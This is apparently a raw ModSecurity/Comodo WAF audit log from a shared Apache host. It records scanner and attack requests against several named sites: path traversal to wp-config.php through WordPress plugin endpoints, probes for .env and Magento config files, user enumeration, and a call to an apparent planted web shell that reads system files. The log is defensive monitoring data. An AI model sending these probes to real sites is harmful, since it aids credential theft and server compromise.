Chrome/78.0.3904.108 Safari/537.36 --59b8081a-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --59b8081a-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.csquaretech.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFCSxQrsPejRtmHkrKLQ3wAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110917796542 723006 (- - -) Stopwatch2: 1750110917796542 723006; combined=2093, p1=343, p2=1661, p3=0, p4=0, p5=88, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --59b8081a-Z-- --060d135c-A-- [17/Jun/2025:03:30:36.499540 +0530] aFCUBEcTB7P_sALtclAKWAAAAAI 18.232.36.1 36828 127.0.0.1 7081 --060d135c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/lvm/profile&viewfile=//etc/lvm/profile/metadata_profile_template.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.232.36.1 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --060d135c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3377 Connection: close Content-Type: text/html; charset=UTF-8 --060d135c-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/lvm/profile/metadata_profile_template.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/lvm/profile/metadata_profile_template.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCUBEcTB7P_sALtclAKWAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750111236494842 4756 (- - -) Stopwatch2: 1750111236494842 4756; combined=2419, p1=380, p2=1854, p3=41, p4=76, p5=68, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --060d135c-Z-- --8345d15c-A-- [17/Jun/2025:03:43:40.983648 +0530] aFCXE4oVQnPDyHnl9oPGOwAAAAY 161.29.232.1 59966 127.0.0.1 7081 --8345d15c-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 161.29.232.1 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 380 accept: */* accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.4751.1921 Mobile Safari/537.36 sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=f13148aca3374c5c074f77909edd61bc1750112013; _ga_PETSZCXF5J=GS2.1.s1750112018$o1$g0$t1750112018$j60$l0$h0; _ga=GA1.1.1689458190.1750112019; _fbp=fb.1.1750112019627.565522000546858646 --8345d15c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=s9une5prio1223k1hqtop9cs8p; expires=Sun, 14 Sep 2025 22:13:40 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --8345d15c-E-- --8345d15c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aFCXE4oVQnPDyHnl9oPGOwAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aFCXE4oVQnPDyHnl9oPGOwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750112019978717 1005041 (- - -) Stopwatch2: 1750112019978717 1005041; combined=3694, p1=455, p2=2965, p3=113, p4=35, p5=126, sr=147, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1750112019" "-" Engine-Mode: "DETECTION_ONLY" --8345d15c-Z-- --3ce86f54-A-- [17/Jun/2025:04:02:40.825718 +0530] aFCbiKC450Yw050Ymr0b2AAAAAk 198.55.98.236 51360 127.0.0.1 7081 --3ce86f54-B-- GET /app/etc/local.xml HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --3ce86f54-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --3ce86f54-H-- Message: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/app/etc/local.xml"] [unique_id "aFCbiKC450Yw050Ymr0b2AAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113160179841 645944 (- - -) Stopwatch2: 1750113160179841 645944; combined=1956, p1=357, p2=1476, p3=0, p4=0, p5=122, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3ce86f54-Z-- --96e5da45-A-- [17/Jun/2025:04:02:41.693050 +0530] aFCbiZVkCcfT-Z8NQYy6cAAAAAc 198.55.98.236 51414 127.0.0.1 7081 --96e5da45-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --96e5da45-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.3.22 Pragma: no-cache Cache-Control: no-cache, must-revalidate, private, max-age=0 Expires: Sat, 26 Jul 1997 05:00:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 --96e5da45-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.dealsdray.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:file: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbiZVkCcfT-Z8NQYy6cAAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.dealsdray.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:file: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbiZVkCcfT-Z8NQYy6cAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113161622085 71031 (- - -) Stopwatch2: 1750113161622085 71031; combined=2194, p1=378, p2=1551, p3=77, p4=45, p5=142, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96e5da45-Z-- --e2a5b06a-A-- [17/Jun/2025:04:02:42.551728 +0530] aFCbilCTF37l_jAzt4oIZQAAAAU 198.55.98.236 51434 127.0.0.1 7081 --e2a5b06a-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --e2a5b06a-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.3.22 Pragma: no-cache Cache-Control: no-cache, must-revalidate, private, max-age=0 Expires: Sat, 26 Jul 1997 05:00:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 --e2a5b06a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:img. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.dealsdray.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:img: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. String match "/wp-admin/admin-ajax.php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/27_Apps_WPPlugin.conf"] [line "3239"] [id "222050"] [rev "8"] [msg "COMODO WAF: Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress (CVE-2014-9734)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbilCTF37l_jAzt4oIZQAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:img. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.dealsdray.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:img: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbilCTF37l_jAzt4oIZQAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match "/wp-admin/admin-ajax.php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/27_Apps_WPPlugin.conf"] [line "3239"] [id "222050"] [rev "8"] [msg "COMODO WAF: Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress (CVE-2014-9734)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbilCTF37l_jAzt4oIZQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113162471151 80657 (- - -) Stopwatch2: 1750113162471151 80657; combined=2202, p1=370, p2=1589, p3=84, p4=43, p5=115, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2a5b06a-Z-- --6f4b1501-A-- [17/Jun/2025:04:02:47.374582 +0530] aFCbjgrsPejRtmHkrKLWMQAAAAE 198.55.98.236 51666 127.0.0.1 7081 --6f4b1501-B-- GET /blog/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --6f4b1501-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --6f4b1501-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/blog/.env"] [unique_id "aFCbjgrsPejRtmHkrKLWMQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113166883133 491513 (- - -) Stopwatch2: 1750113166883133 491513; combined=1712, p1=357, p2=1258, p3=0, p4=0, p5=97, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f4b1501-Z-- --314be650-A-- [17/Jun/2025:04:02:48.738810 +0530] aFCbkBwcFb_n1P0IC9yLFwAAAAo 198.55.98.236 51786 127.0.0.1 7081 --314be650-B-- GET /admin/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --314be650-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --314be650-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/admin/.env"] [unique_id "aFCbkBwcFb_n1P0IC9yLFwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113168282397 456505 (- - -) Stopwatch2: 1750113168282397 456505; combined=2607, p1=490, p2=1911, p3=0, p4=0, p5=206, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --314be650-Z-- --fb1ab04f-A-- [17/Jun/2025:04:02:50.049211 +0530] aFCbkVCTF37l_jAzt4oIbQAAAAU 198.55.98.236 47414 127.0.0.1 7081 --fb1ab04f-B-- GET /laravel/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --fb1ab04f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --fb1ab04f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/laravel/.env"] [unique_id "aFCbkVCTF37l_jAzt4oIbQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113169616031 433259 (- - -) Stopwatch2: 1750113169616031 433259; combined=1972, p1=404, p2=1458, p3=0, p4=0, p5=110, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fb1ab04f-Z-- --a17d7170-A-- [17/Jun/2025:04:02:51.375675 +0530] aFCbkgrsPejRtmHkrKLWNgAAAAE 198.55.98.236 47574 127.0.0.1 7081 --a17d7170-B-- GET /services/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --a17d7170-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --a17d7170-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/services/.env"] [unique_id "aFCbkgrsPejRtmHkrKLWNgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113170929260 446481 (- - -) Stopwatch2: 1750113170929260 446481; combined=1799, p1=364, p2=1333, p3=0, p4=0, p5=102, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a17d7170-Z-- --e41ffe5e-A-- [17/Jun/2025:04:02:52.736359 +0530] aFCblJVkCcfT-Z8NQYy6eAAAAAc 198.55.98.236 47780 127.0.0.1 7081 --e41ffe5e-B-- GET /config/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --e41ffe5e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --e41ffe5e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/config/.env"] [unique_id "aFCblJVkCcfT-Z8NQYy6eAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113172299108 437348 (- - -) Stopwatch2: 1750113172299108 437348; combined=2185, p1=447, p2=1644, p3=0, p4=0, p5=94, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e41ffe5e-Z-- --4e0d7478-A-- [17/Jun/2025:04:02:54.154974 +0530] aFCblVJfblPUQiSn5r2HPQAAAAA 198.55.98.236 47954 127.0.0.1 7081 --4e0d7478-B-- GET /service/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --4e0d7478-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --4e0d7478-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/service/.env"] [unique_id "aFCblVJfblPUQiSn5r2HPQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113173648751 506303 (- - -) Stopwatch2: 1750113173648751 506303; combined=153164, p1=269, p2=862, p3=0, p4=0, p5=76066, sr=71, sw=0, l=0, 